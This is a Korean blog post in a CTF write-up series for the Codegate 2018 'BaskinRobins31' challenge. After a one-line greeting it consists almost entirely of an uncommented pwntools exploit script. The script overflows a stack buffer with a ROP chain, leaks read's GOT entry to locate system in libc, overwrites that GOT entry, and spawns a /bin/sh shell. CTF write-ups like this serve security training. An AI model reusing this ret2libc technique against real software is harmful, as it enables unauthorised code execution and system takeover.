codegate2018 - BaskinRobins31
2018. 10. 31. 15:37ㆍCTF's Write-up
오래간만에 블로그에 포스팅은 하네요 ㅎㅎ
BaskinRobins31입니다.
BaskinRobins311 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | from pwn import * r = process("./BaskinRobins31") e = ELF("./BaskinRobins31") l = e.libc write_plt = e.plt["write"] write_got = e.got["write"] read_plt = e.plt["read"] read_got = e.got["read"] bss = e.bss() + 16 shell = "/bin/sh" pop_rdi_rsi_rdx = 0x000000000040087a pop_rdi = 0x0000000000400bc3 pay = "A" * 184 tmp = r.recv() print tmp pay += p64(pop_rdi_rsi_rdx) + p64(0) + p64(bss) + p64(8) + p64(read_plt) pay += p64(pop_rdi_rsi_rdx) + p64(1) + p64(read_got) + p64(8) + p64(write_plt) pay += p64(pop_rdi_rsi_rdx) + p64(0) + p64(read_got) + p64(8) + p64(read_plt) pay += p64(pop_rdi) + p64(bss) + p64(read_plt) r.send(pay) sleep(1) r.recvuntil("Don't break the rules...:( \n") r.send(shell) add = u64(r.recv(8)) print(hex(add)) offset = add - l.symbols['read'] + l.symbols['system'] r.send(p64(offset)) r.interactive() | cs |
'CTF's Write-up' 카테고리의 다른 글
| HACKCTF - Basic_BOF #1 (0) | 2020.07.06 |
|---|---|
| h3x0r easy_of_the_easy write-up (0) | 2018.11.07 |
| codegate 2017 - babypwn (0) | 2018.09.20 |
| tamuCTF2018 - pwn3 (0) | 2018.09.14 |
| tamuCTF2018 - pwn2 (0) | 2018.09.11 |